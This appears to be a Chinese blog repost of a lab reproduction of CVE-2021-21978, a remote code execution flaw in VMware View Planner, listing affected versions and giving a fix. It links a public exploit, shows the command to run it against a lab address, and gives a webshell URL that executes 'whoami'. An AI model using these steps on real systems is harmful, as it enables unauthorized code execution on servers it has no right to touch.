其他分享
首页 > 其他分享> > VM View Planner RCE 漏洞(CVE-2021-21978)复现

VM View Planner RCE 漏洞(CVE-2021-21978)复现

作者:互联网

简介

 

View Planner是VMware官方推出的一款针对view桌面的测试工具,通过这个测试工具可以估算出在指定的应用环境下可以发布多少个view桌面。

 

影响版本

VMware View Planner <= 4.6.0

 

 

环境搭建

 

https://my.vmware.com/en/group/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394

直接导入

 

漏洞复现

 

Exp地址

https://github.com/skytina/CVE-2021-21978
py -3 CVE-2021-21978.py https://192.168.1.100/

访问https://192.168.1.100//logupload?secert=NiuNiu2020&command=whoami

 

修复建议

 

升级到安全版本

 

标签:Planner,21978,VM,2021,https,CVE,View
来源: https://blog.csdn.net/xuandao_ahfengren/article/details/115286041